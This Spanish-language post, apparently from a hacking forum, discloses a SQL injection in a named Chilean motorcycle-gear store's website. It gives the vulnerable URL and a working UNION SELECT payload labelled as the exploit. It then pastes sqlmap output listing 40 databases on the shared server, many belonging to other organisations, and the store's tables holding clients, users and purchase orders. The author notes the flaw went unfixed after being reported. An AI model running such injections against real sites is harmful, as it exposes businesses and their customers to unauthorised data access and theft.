Sitio : http://www.procircuit.cl
Descripción Del Sitio : Venta de artículos y accesorios para motociclistas
[SQLi] Inyección en URL(http://fotos.subefotos.com/16e286b07e378ff68333ad71de2f3bd5o.png)
Descripción de la inyección : es una inyección muy básica pero no por eso la vulnerabilidad deja de ser peligrosa, ya que expone todas las bases de datos alojadas en el servidor. Url del sitio : http://www.procircuit.cl/2011/listado_productos.asp?papa=23&categoria_buscar=23&marca_buscar=294
Xploit : http://www.procircuit.cl/2011/listado_productos.asp?papa=23&categoria_buscar=23&marca_buscar=294%27%20union%20select%201,2,3,4,5,6,USER%20--
Reportado : SI (hace mas de 1 mes y aun no la reparan así que no creo que lo hagan)
Después de unos momentos de Sqlmap ;)
Listado de las db alojadas en el servidor
available databases [40]:
[*] admin_prueba
[*] AirCloud
[*] AirCloud_M
[*] AirCloud_Soporte
[*] BD_CLAZO
[*] BD_Procircuit2015
[*] BDdes1
[*] BDPREL2
[*] bea_profile_management
[*] BibliotecaElecmetal
[*] Britanico2
[*] Britanico_Eng
[*] datacenter
[*] DirectoPro_db2
[*] GORILACONTROL
[*] iia_db_encuesta
[*] iia_elecmetal_cl
[*] INDISA_WFLOW
[*] ingles
[*] localhost
[*] master
[*] model
[*] moscoso_cl_1
[*] msdb
[*] pide
[*] plataforma
[*] prueba2
[*] psa
[*] ReportServer
[*] ReportServerTempDB
[*] sitebuilderAFE1A86606277534FBE47ED6219A39AF
[*] soporte_
[*] soporte_1
[*] soporte_indisa
[*] soporte_prueba
[*] soporte_pruebas
[*] soporte_test
[*] tempdb
[*] Traspaso
[*] traspaso 2 prueba
Tablas de la db de la pagina BD_Procircuit2015
+------------------------------------------------+
| cal_user_procircuit.PC_ALCPOPUP |
| cal_user_procircuit.PC_ALCUSER |
| cal_user_procircuit.PC_CATEGMENU |
| cal_user_procircuit.pc_Noticia |
| cal_user_procircuit.pc_SemiNuevas_Cotizacion |
| cal_user_procircuit.pc_aplicacion |
| cal_user_procircuit.pc_busqueda |
| cal_user_procircuit.pc_carro |
| cal_user_procircuit.pc_categoria |
| cal_user_procircuit.pc_clasificacion |
| cal_user_procircuit.pc_cliente |
| cal_user_procircuit.pc_contacto |
| cal_user_procircuit.pc_cotizacion |
| cal_user_procircuit.pc_cotizacion_item |
| cal_user_procircuit.pc_cotizacion_movimiento |
| cal_user_procircuit.pc_estado_cotizacion |
| cal_user_procircuit.pc_estado_orden_compra |
| cal_user_procircuit.pc_estado_pago |
| cal_user_procircuit.pc_galeria |
| cal_user_procircuit.pc_marca |
| cal_user_procircuit.pc_motivo_no_pago |
| cal_user_procircuit.pc_orden_compra |
| cal_user_procircuit.pc_orden_compra_item |
| cal_user_procircuit.pc_orden_compra_movimiento |
| cal_user_procircuit.pc_perfil |
| cal_user_procircuit.pc_perfil_aplicacion |
| cal_user_procircuit.pc_producto |
| cal_user_procircuit.pc_producto_busqueda |
| cal_user_procircuit.pc_producto_contacto |
| cal_user_procircuit.pc_producto_relacionado |
| cal_user_procircuit.pc_promocion |
| cal_user_procircuit.pc_repuesto |
| cal_user_procircuit.pc_segmento |
| cal_user_procircuit.pc_subcategoria |
| cal_user_procircuit.pc_sucursal |
| cal_user_procircuit.pc_usuario |
+------------------------------------------------+
No busque mas vulnerabilidades en la pagina, pero estoy seguro que tienen que existir mas ;D
Autor:
RREEDD
Saludos desde Chile
Abriendo sqlmap en 3..2..1..